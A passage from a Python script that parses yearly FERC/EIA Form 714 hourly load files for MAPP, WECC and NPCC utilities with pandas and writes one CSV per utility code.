1999 : pd.read_fwf('%s/mapp/1999/NWPS99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/NWPS02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/NWPS03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
14127 : {
1993 : pd.read_fwf('%s/mapp/1993/OPPD93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/OPPD94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/mapp/1995/OPPD95' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 7:].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/OPPD96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/OPPD97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/OPPD98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/OPPD99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/OPPD02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/OPPD03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
14232 : {
1993 : pd.read_fwf('%s/mapp/1993/OTP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/OTP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/mapp/1995/OTP95' % (fulldir), header=None).iloc[:, -2].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/OTP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/OTP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/OTP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/OTP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/OTP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/OTP02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/OTP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
40580 : {
1993 : pd.read_fwf('%s/mapp/1993/SMMP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/SMP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/SMMP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/SMMP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/SMMP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/SMMPA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_csv('%s/mapp/2000/SMMP00' % (fulldir)).iloc[:-1, 3].values,
2001 : pd.read_csv('%s/mapp/2001/SMMP01' % (fulldir), header=None).iloc[:, 2].values,
2002 : pd.read_fwf('%s/mapp/2002/SMMPA02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/SMMPA03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
19514 : {
1993 : pd.read_fwf('%s/mapp/1993/UPA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/UPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/UPA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/UPA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/UPA98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
20858 : {
1993 : pd.read_fwf('%s/mapp/1993/WPPI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/WPPI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/WPPI96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_csv('%s/mapp/1997/WPPI97' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:-1].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/WPPI98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/WPPI99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/WPPI02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/WPPI03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
12341 : {
1995 : pd.read_fwf('%s/mapp/1995/MEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/MEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MEC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MEC_ALL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
4322 : {
1993 : pd.read_fwf('%s/mapp/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/CP96' % (fulldir), header=None).iloc[:, 2:].values.ravel()
},
23333 : {
1993 : pd.read_fwf('%s/mapp/1993/MPSI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MPSI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MPSI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
}
}
# Post-process the assembled MAPP series and write one CSV per utility code.
# Two series are blanked to NaN — presumably the source files were judged
# unusable (TODO confirm against the raw data); negative loads are clamped.
mapp[20858][1997] = np.repeat(np.nan, len(mapp[20858][1997]))  # WPPI 1997: discard values, keep length
mapp[21352][1995][mapp[21352][1995] < 0] = 0                   # clamp spurious negative loads to zero
mapp[40580][2000] = np.repeat(np.nan, len(mapp[40580][2000]))  # SMMP 2000: discard values, keep length
if not os.path.exists('./mapp'):
    os.mkdir('mapp')
for k in mapp.keys():
    # FIX: `print k` is Python-2-only syntax; the parenthesized form behaves
    # identically under Python 2 and is required under Python 3.
    print(k)
    # Index each year's flat hourly vector from Jan 1 of that year, then
    # concatenate all years into a single chronologically sorted series.
    s = pd.DataFrame(pd.concat([pd.Series(mapp[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(mapp[k][i]))) for i in mapp[k].keys()]).sort_index(), columns=['load'])
    # Zero readings are treated as missing data, not true zero load.
    s['load'] = s['load'].astype(float).replace(0, np.nan)
    s.to_csv('./mapp/%s.csv' % k)
#################################
# WECC
#################################
import numpy as np
import pandas as pd
import os
import re
import datetime
import time
import pysal as ps
# Root of the WSCC/WECC FERC Form 714 archive; the directory layout (and even
# the council's name, WSCC vs. WECC) changes from year to year.
homedir = os.path.expanduser('~')
basepath = homedir + '/github/RIPS_kircheis/data/eia_form_714/active'
# Per-year subdirectory holding that year's per-utility .dat files; 2006 is
# special — a single consolidated CSV instead of a directory of files.
path_d = {
    1993: '93WSCC1/WSCC',
    1994: '94WSCC1/WSCC1994',
    1995: '95WSCC1',
    1996: '96WSCC1/WSCC1996',
    1997: '97wscc1',
    1998: '98WSCC1/WSCC1',
    1999: '99WSCC1/WSCC1',
    2000: '00WSCC1/WSCC1',
    2001: '01WECC/WECC01/wecc01',
    2002: 'WECCONE3/WECC One/WECC2002',
    2003: 'WECC/WECC/WECC ONE/wecc03',
    2004: 'WECC_2004/WECC/WECC One/ferc',
    2006: 'form714-database_2006_2013/form714-database/Part 3 Schedule 2 - Planning Area Hourly Demand.csv',
}
#### GET UNIQUE UTILITIES AND UTILITIES BY YEAR
u_by_year = {}
for d in path_d:
if d != 2006:
full_d = basepath + '/' + path_d[d]
l = [i.lower().split('.')[0][:-2] for i in os.listdir(full_d) if i.lower().endswith('dat')]
u_by_year.update({d : sorted(l)})
unique_u = np.unique(np.concatenate([np.array(i) for i in u_by_year.values()]))
#### GET EIA CODES OF WECC UTILITIES
# Per-year README (or equivalent) that contains the filename -> EIA code ->
# utility name table used to resolve stems to EIA identifiers.
rm_d = {}
for year, readme in [
        (1993, '93WSCC1/README2'),
        (1994, '94WSCC1/README.TXT'),
        (1995, '95WSCC1/README.TXT'),
        (1996, '96WSCC1/README.TXT'),
        (1997, '97wscc1/README.TXT'),
        (1998, '98WSCC1/WSCC1/part.002'),
        (1999, '99WSCC1/WSCC1/README.TXT'),
        (2000, '00WSCC1/WSCC1/README.TXT'),
        (2001, '01WECC/WECC01/wecc01/README.TXT'),
        (2002, 'WECCONE3/WECC One/WECC2002/README.TXT'),
        (2003, 'WECC/WECC/WECC ONE/wecc03/README.TXT'),
        (2004, 'WECC_2004/WECC/WECC One/ferc/README.TXT')]:
    rm_d[year] = {'rm': readme}
# Record, for each year's README, the line indices bracketing the file-name
# table: 'op' is the 'FILE NAME' header line, 'ed' the footnote about
# utilities that did not file with FERC.  (These bounds are currently only
# consumed by a commented-out slice below.)
for d in rm_d.keys():
    fn = basepath + '/' + rm_d[d]['rm']
    with open(fn, 'r') as f:  # context manager guarantees the handle is closed
        r = f.readlines()
    for i, line in enumerate(r):
        if 'FILE NAME' in line:
            rm_d[d]['op'] = i
        # BUG FIX: the original condition was `'FERC' and 'not' in line`,
        # which Python parses as `'FERC' and ('not' in line)` — the truthy
        # literal 'FERC' is ignored, so ANY line containing 'not' matched.
        # Require both substrings, as clearly intended.
        if 'FERC' in line and 'not' in line:
            rm_d[d]['ed'] = i
# Resolve each utility filename stem to its EIA code and full name by matching
# lines of the yearly READMEs.  The matched line starts with the data filename
# (e.g. '<stem><yy>.dat'); token [1] is the code and the remainder the name.
unique_u_ids = {}
# PERF: read each README once up front instead of once per (utility, year)
# pair — the original re-opened every file for every stem.
readme_lines = {}
for d in rm_d.keys():
    with open(basepath + '/' + rm_d[d]['rm'], 'r') as f:
        readme_lines[d] = f.readlines()
for u in unique_u:
    # BUG FIX: the original pattern '^ *%s\d\d.dat' left the dot unescaped
    # (matching any character before 'dat'); re.escape also protects against
    # any regex metacharacter that might appear in a stem.
    regex = re.compile(r'^ *%s\d\d\.dat' % re.escape(u), re.IGNORECASE)
    for d in rm_d.keys():
        for line in readme_lines[d]:
            if re.search(regex, line):
                code = line.split()[1]
                nm = line.split(code)[1].strip()  # everything after the code token
                unique_u_ids[u] = {'code': code, 'name': nm}
                break
        if u in unique_u_ids:
            break  # first year containing the stem wins, as before
# Join the EIA codes parsed from the READMEs onto the 2006+ FERC respondent-ID
# table, keeping only utilities present in both.
id_2006 = pd.read_csv('%s/form714-database_2006_2013/form714-database/Respondent IDs.csv' % (basepath))
id_2006 = id_2006.drop_duplicates('eia_code').set_index('eia_code').sort_index()
ui = pd.DataFrame.from_dict(unique_u_ids, orient='index')
has_code = ui['code'] != '*'  # '*' marks entries without a usable code
ui = ui.loc[has_code].drop_duplicates('code')
ui['code'] = ui['code'].astype(int)
ui = ui.set_index('code')
eia_to_r = pd.concat([ui, id_2006], axis=1).dropna()
# util = {
# 'aps' : 803,
# 'srp' : 16572,
# 'ldwp' : 11208
# }
# util_2006 = {
# 'aps' : 116,
# 'srp' : 244,
# 'ldwp' : 194
# }
#resp_ids = '/home/akagi/Documents/EIA_form_data/wecc_form_714/form714-database_2006_2013/form714-database/Respondent IDs.csv'
# Path to the 2006+ respondent-ID table (read again by helpers below).
resp_ids = '%s/form714-database_2006_2013/form714-database/Respondent IDs.csv' % (basepath)
df_path_d = {}  # NOTE(review): apparently filled in place by build_paths() — confirm
df_d = {}       # NOTE(review): apparently filled in place by build_paths() — confirm
# build_paths() is defined elsewhere in this file; it presumably populates the
# two dicts above from the module-level globals set up here — TODO confirm.
build_paths()
#### Southern California Edison part of CAISO in 2006-2013: resp id 125
if not os.path.exists('./wecc'):
    os.mkdir('wecc')
# Write one CSV per utility: named by its numeric EIA code when one was
# resolved, otherwise by the raw filename stem.
for x in unique_u:
    out_df = build_df(x)
    dest = x
    if x in unique_u_ids.keys():
        code = unique_u_ids[x]['code']
        if code.isdigit():
            dest = code
    out_df.to_csv('./wecc/%s.csv' % dest)
#################################
from itertools import chain
# Reconciliation pass: gather every CSV written under the per-region output
# directories and compare against the respondent-ID table.
per_dir = []
for sub in os.listdir('.'):
    per_dir.append(os.listdir('./%s' % (sub)))
s = pd.Series(list(chain(*per_dir)))
s = s.str.replace('\.csv', '')
# Numeric filenames are the EIA codes we actually produced.
u = s[s.str.contains('\d+')].str.replace('[^\d]', '').astype(int).unique()
homedir = os.path.expanduser('~')
rid = pd.read_csv('%s/github/RIPS_kircheis/data/eia_form_714/active/form714-database/form714-database/Respondent IDs.csv' % homedir)
ridu = rid[rid['eia_code'] != 0]
# Interactive-style inspection of respondents with no output file; the
# resulting frame is not assigned (result is discarded when run as a script).
ridu[~ridu['eia_code'].isin(u)]
import pandas as pd
import os
import datetime
homedir = os.path.expanduser('~')
datadir = 'github/RIPS_kircheis/data/eia_form_714/processed/'
fulldir = homedir + '/' + datadir
# li = []
# for d1 in os.listdir('.'):
# for fn in os.listdir('./%s' % d1):
# li.append(fn)
# dir_u = pd.Series(li).str[:-2].order().unique()
###### NPCC
# BECO: 54913 <- 1998
# BHE: 1179
# CELC: 1523 <- 2886
# CHGE: 3249
# CMP: 3266
# COED: 4226
# COEL: 4089 -> IGNORE
# CVPS: 3292
# EUA: 5618
# GMP: 7601
# ISONY: 13501
# LILC: 11171 <- 11172
# MMWE: 11806
# NEES: 13433
# NEPOOL: 13435
# NMPC: 13573
# NU: 13556
# NYPA: 15296
# NYPP: 13501
# NYS: 13511
# OR: 14154
# RGE: 16183
# UI: 19497
npcc = {
54913 : {
1993 : pd.read_fwf('%s/npcc/1993/BECO93' % (fulldir), header=None, skipfooter=1).loc[:, 2:].values.ravel(),
1994 : pd.read_csv('%s/npcc/1994/BECO94' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[4].values,
1995 : pd.read_csv('%s/npcc/1995/BECO95' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
1996 : pd.read_csv('%s/npcc/1996/BECO96' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
1997 : pd.read_csv('%s/npcc/1997/BECO97' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[4].values,
1998 : pd.read_csv('%s/npcc/1998/BECO98' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
1999 : pd.read_csv('%s/npcc/1999/BECO99' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2000 : pd.read_csv('%s/npcc/2000/BECO00' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2001 : pd.read_csv('%s/npcc/2001/BECO01' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2002 : pd.read_csv('%s/npcc/2002/BECO02' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2003 : pd.read_csv('%s/npcc/2003/BECO03' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2004 : pd.read_csv('%s/npcc/2004/BECO04' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values
},
1179 : {
1993 : pd.read_csv('%s/npcc/1993/BHE93' % (fulldir), sep=' ', skiprows=2, skipinitialspace=True).loc[:, '0000':].values.ravel(),
1994 : pd.read_csv('%s/npcc/1994/BHE94' % (fulldir)).dropna(how='all').loc[:729, '1/13':'12/24'].values.ravel(),
1995 : (pd.read_fwf('%s/npcc/1995/BHE95' % (fulldir)).loc[:729, '1/13':'1224'].astype(float)/10).values.ravel(),
2001 : pd.read_excel('%s/npcc/2001/BHE01' % (fulldir), skiprows=2).iloc[:, 1:24].values.ravel(),
2003 : pd.read_excel('%s/npcc/2003/BHE03' % (fulldir), skiprows=3).iloc[:, 1:24].values.ravel()
},
1523 : {
1999 : pd.read_csv('%s/npcc/1999/CELC99' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2000 : pd.read_csv('%s/npcc/2000/CELC00' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2001 : pd.read_csv('%s/npcc/2001/CELC01' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2002 : pd.read_csv('%s/npcc/2002/CELC02' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2003 : pd.read_csv('%s/npcc/2003/CELC03' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2004 : pd.read_csv('%s/npcc/2004/CELC04' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values
},
3249 : {
1993 : pd.read_csv('%s/npcc/1993/CHGE93' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[2].values,
1994 : pd.read_fwf('%s/npcc/1994/CHGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(float).values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/CHGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/CHGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(float).values.ravel(),
1997 : pd.read_csv('%s/npcc/1997/CHGE97' % (fulldir), sep ='\s', skipinitialspace=True, header=None, skipfooter=1).iloc[:, 4:].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/CHGE98' % (fulldir), skipfooter=1, header=None).iloc[:, 2:].values.ravel(),
},
3266 : {
1993 : pd.read_fwf('%s/npcc/1993/CMP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/CMP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/CMP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/CMP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/CMP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/CMP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/npcc/2002/CMP02' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
2003 : pd.read_fwf('%s/npcc/2003/CMP03' % (fulldir), header=None).iloc[:, 1:].values.ravel()
},
4226 : {
1993 : pd.read_csv('%s/npcc/1993/COED93' % (fulldir), skipfooter=1, skiprows=11, header=None, skipinitialspace=True, sep=' ')[2].values,
1994 : pd.read_fwf('%s/npcc/1994/COED94' % (fulldir), skipfooter=1, header=None)[1].values,
1995 : pd.read_csv('%s/npcc/1995/COED95' % (fulldir), skiprows=3, header=None),
1996 : pd.read_excel('%s/npcc/1996/COED96' % (fulldir)).iloc[:, -1].values.ravel(),
1997 : pd.read_excel('%s/npcc/1997/COED97' % (fulldir), skiprows=1).iloc[:, -1].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/COED98' % (fulldir), skiprows=1).iloc[:, -1].values.ravel(),
1999 : pd.read_csv('%s/npcc/1999/COED99' % (fulldir), skiprows=1, sep='\t').iloc[:, -1].str.replace(',', '').astype(int).values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/COED00' % (fulldir), sep='\t')[' Load '].dropna().str.replace(',', '').astype(int).values.ravel(),
2001 : pd.read_csv('%s/npcc/2001/COED01' % (fulldir), sep='\t', skipfooter=1)['Load'].dropna().str.replace(',', '').astype(int).values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/COED02' % (fulldir), sep='\t', skipfooter=1, skiprows=1)['Load'].dropna().str.replace(',', '').astype(int).values.ravel(),
2003 : pd.read_csv('%s/npcc/2003/COED03' % (fulldir), sep='\t')['Load'].dropna().astype(int).values.ravel(),
2004 : pd.read_csv('%s/npcc/2004/COED04' % (fulldir), header=None).iloc[:, -1].str.replace('[A-Z,]', '').str.replace('\s', '0').astype(int).values.ravel()
},
4089 : {
1993 : pd.read_fwf('%s/npcc/1993/COEL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/COEL95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/COEL96' % (fulldir), sep=' ', skipinitialspace=True, header=None)[3].values,
1997 : pd.read_csv('%s/npcc/1997/COEL97' % (fulldir), sep=' ', skipinitialspace=True, header=None)[4].values,
1998 : pd.read_csv('%s/npcc/1998/COEL98' % (fulldir), sep=' ', skipinitialspace=True, header=None)[4].values,
1999 : pd.read_csv('%s/npcc/1999/COEL99' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2000 : pd.read_csv('%s/npcc/2000/COEL00' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2001 : pd.read_csv('%s/npcc/2001/COEL01' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2002 : pd.read_csv('%s/npcc/2002/COEL02' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2003 : pd.read_csv('%s/npcc/2003/COEL03' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2004 : pd.read_csv('%s/npcc/2004/COEL04' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values
},
3292 : {
1995 : pd.read_fwf('%s/npcc/1995/CVPS95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/CVPS96' % (fulldir), header=None, skipfooter=1)[1].values,
1997 : pd.read_csv('%s/npcc/1997/CVPS97' % (fulldir), header=None)[2].values,
1998 : pd.read_csv('%s/npcc/1998/CVPS98' % (fulldir), header=None, skipfooter=1)[4].values,
1999 : pd.read_csv('%s/npcc/1999/CVPS99' % (fulldir))['Load'].values
},
5618 : {
